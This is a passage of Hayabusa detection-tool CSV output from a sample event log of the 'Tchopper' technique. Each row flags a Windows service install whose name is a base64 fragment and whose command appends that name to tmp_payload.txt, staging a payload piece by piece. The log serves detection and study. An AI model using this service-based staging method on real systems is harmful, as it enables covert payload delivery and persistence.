execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:02.992 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 5tYW5hZ2VtZW50RGF0ZVRpbWVDb252ZXJ0ZXJdOjpUb0RhdGVUaW1lKCRnZXR3bWlvbGRldmVudC5UaW1lR2VuZXJhdGVkKSAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRU | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg34"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:16:04.456 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: aW1lID0gW21hbmFnZW1lbnQubWFuYWdlbWVudERhdGVUaW1lQ29udmVydGVyXTo6VG9EYXRlVGltZSgkZ2V0d21pbmV3ZXN0LlRpbWVHZW5lcmF0ZWQpDQoNCg0KICAgICAgICAgICAgICAgIH0NCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg35"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:04.456 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: aW1lID0gW21hbmFnZW1lbnQubWFuYWdlbWVudERhdGVUaW1lQ29udmVydGVyXTo6VG9EYXRlVGltZSgkZ2V0d21pbmV3ZXN0LlRpbWVHZW5lcmF0ZWQpDQoNCg0KICAgICAgICAgICAgICAgIH0NCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg35"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:04.456 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: aW1lID0gW21hbmFnZW1lbnQubWFuYWdlbWVudERhdGVUaW1lQ29udmVydGVyXTo6VG9EYXRlVGltZSgkZ2V0d21pbmV3ZXN0LlRpbWVHZW5lcmF0ZWQpDQoNCg0KICAgICAgICAgICAgICAgIH0NCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg35"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:16:05.897 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 0KICAgICAgICAgICAgZWxzZSB7DQoNCiAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9IChHZXQtV2luRXZlbnQgLUxpc3RMb2cgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg36"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:05.897 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0KICAgICAgICAgICAgZWxzZSB7DQoNCiAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9IChHZXQtV2luRXZlbnQgLUxpc3RMb2cgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg36"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:05.897 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0KICAgICAgICAgICAgZWxzZSB7DQoNCiAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9IChHZXQtV2luRXZlbnQgLUxpc3RMb2cgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg36"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:16:07.351 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bnRpYWwgJEdsb2JhbDpDcmVkKS5SZWNvcmRDb3VudA0KDQogICAgICAgICAgICAkTG9nU2l6ZSA9ICgoR2V0LVdpbkV2ZW50IC1MaXN0TG9nICRMb2dOYW1lIC1Db21wdXRlck5hbWUgJEFnZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg37"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:07.351 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bnRpYWwgJEdsb2JhbDpDcmVkKS5SZWNvcmRDb3VudA0KDQogICAgICAgICAgICAkTG9nU2l6ZSA9ICgoR2V0LVdpbkV2ZW50IC1MaXN0TG9nICRMb2dOYW1lIC1Db21wdXRlck5hbWUgJEFnZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg37"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:07.351 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bnRpYWwgJEdsb2JhbDpDcmVkKS5SZWNvcmRDb3VudA0KDQogICAgICAgICAgICAkTG9nU2l6ZSA9ICgoR2V0LVdpbkV2ZW50IC1MaXN0TG9nICRMb2dOYW1lIC1Db21wdXRlck5hbWUgJEFnZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg37"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:16:08.797 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuRmlsZVNpemUgLyAxTUIpICMgU2V0IHRvIE1CDQogICAgICAgICAgICANCiAgICAgICAgICAgICMkTG9nU2l6ZSA9IFttYXRoXTo6Um91bmQoKCRMb2dT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg38"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:08.797 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuRmlsZVNpemUgLyAxTUIpICMgU2V0IHRvIE1CDQogICAgICAgICAgICANCiAgICAgICAgICAgICMkTG9nU2l6ZSA9IFttYXRoXTo6Um91bmQoKCRMb2dT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg38"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:08.797 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuRmlsZVNpemUgLyAxTUIpICMgU2V0IHRvIE1CDQogICAgICAgICAgICANCiAgICAgICAgICAgICMkTG9nU2l6ZSA9IFttYXRoXTo6Um91bmQoKCRMb2dT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg38"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:16:10.344 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: aXplKSwgMSkNCiAgICAgDQogICAgICAgICAgICBpZiAoJFRvdGFsTG9nRXZlbnRzIC1lcSAwKSB7DQogICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg39"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:10.344 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: aXplKSwgMSkNCiAgICAgDQogICAgICAgICAgICBpZiAoJFRvdGFsTG9nRXZlbnRzIC1lcSAwKSB7DQogICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg39"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:10.344 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: aXplKSwgMSkNCiAgICAgDQogICAgICAgICAgICBpZiAoJFRvdGFsTG9nRXZlbnRzIC1lcSAwKSB7DQogICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg39"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:16:11.817 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: hlcmUgYXJlIDAgJExvZ05hbWUgRXZlbnRzIg0KICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSAwDQogICAgICAgICAgICAgICAgICAgJE5ld2VzdEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg40"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:11.817 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: hlcmUgYXJlIDAgJExvZ05hbWUgRXZlbnRzIg0KICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSAwDQogICAgICAgICAgICAgICAgICAgJE5ld2VzdEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg40"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:11.817 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: hlcmUgYXJlIDAgJExvZ05hbWUgRXZlbnRzIg0KICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSAwDQogICAgICAgICAgICAgICAgICAgJE5ld2VzdEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg40"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:16:13.280 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZW50VGltZSA9IDANCiAgICAgICAgICAgICAgICAgICAkVG90YWxUaW1lID0gMA0KICAgICAgICAgICAgICAgICAgICRBdmdFdmVudHNQZXJTZWNvbmQgPSAwDQogICAgICAgICAgICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg41"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:13.280 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZW50VGltZSA9IDANCiAgICAgICAgICAgICAgICAgICAkVG90YWxUaW1lID0gMA0KICAgICAgICAgICAgICAgICAgICRBdmdFdmVudHNQZXJTZWNvbmQgPSAwDQogICAgICAgICAgICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg41"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:13.280 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZW50VGltZSA9IDANCiAgICAgICAgICAgICAgICAgICAkVG90YWxUaW1lID0gMA0KICAgICAgICAgICAgICAgICAgICRBdmdFdmVudHNQZXJTZWNvbmQgPSAwDQogICAgICAgICAgICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg41"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:16:14.730 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: F2Z0V2ZW50c1BlclNlY29uZCA9IDANCg0KICAgICAgICAgICAgICAgIH0gDQoNCiAgICAgICAgICAgICAgICBlbHNlIHsNCg0KICAgICAgICAgICAgICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGlt | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg42"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:14.730 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: F2Z0V2ZW50c1BlclNlY29uZCA9IDANCg0KICAgICAgICAgICAgICAgIH0gDQoNCiAgICAgICAgICAgICAgICBlbHNlIHsNCg0KICAgICAgICAgICAgICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGlt | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg42"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:14.730 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: F2Z0V2ZW50c1BlclNlY29uZCA9IDANCg0KICAgICAgICAgICAgICAgIH0gDQoNCiAgICAgICAgICAgICAgICBlbHNlIHsNCg0KICAgICAgICAgICAgICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGlt | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg42"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:16:16.183 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1PbGRlc3QgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZCAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg43"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:16.183 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1PbGRlc3QgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZCAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg43"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:16.183 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1PbGRlc3QgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZCAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg43"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:16:17.653 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgDQogICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRUaW1lID0gKEdldC1XaW5FdmVudCAkTG9nTmFtZSAtQ29tcHV0ZXJOYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg44"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:17.653 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgDQogICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRUaW1lID0gKEdldC1XaW5FdmVudCAkTG9nTmFtZSAtQ29tcHV0ZXJOYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg44"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:17.653 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgDQogICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRUaW1lID0gKEdldC1XaW5FdmVudCAkTG9nTmFtZSAtQ29tcHV0ZXJOYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg44"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:16:19.099 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: YmFsOkNyZWQgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg45"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:19.099 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: YmFsOkNyZWQgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg45"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:19.099 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: YmFsOkNyZWQgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg45"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:16:20.573 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 90YWxUaW1lID0gKEdldC1EYXRlKS5TdWJ0cmFjdCgkT2xkZXN0RXZlbnRUaW1lKS5Ub3RhbFNlY29uZHMNCiAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg46"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:20.573 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 90YWxUaW1lID0gKEdldC1EYXRlKS5TdWJ0cmFjdCgkT2xkZXN0RXZlbnRUaW1lKS5Ub3RhbFNlY29uZHMNCiAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg46"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:20.573 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 90YWxUaW1lID0gKEdldC1EYXRlKS5TdWJ0cmFjdCgkT2xkZXN0RXZlbnRUaW1lKS5Ub3RhbFNlY29uZHMNCiAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg46"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
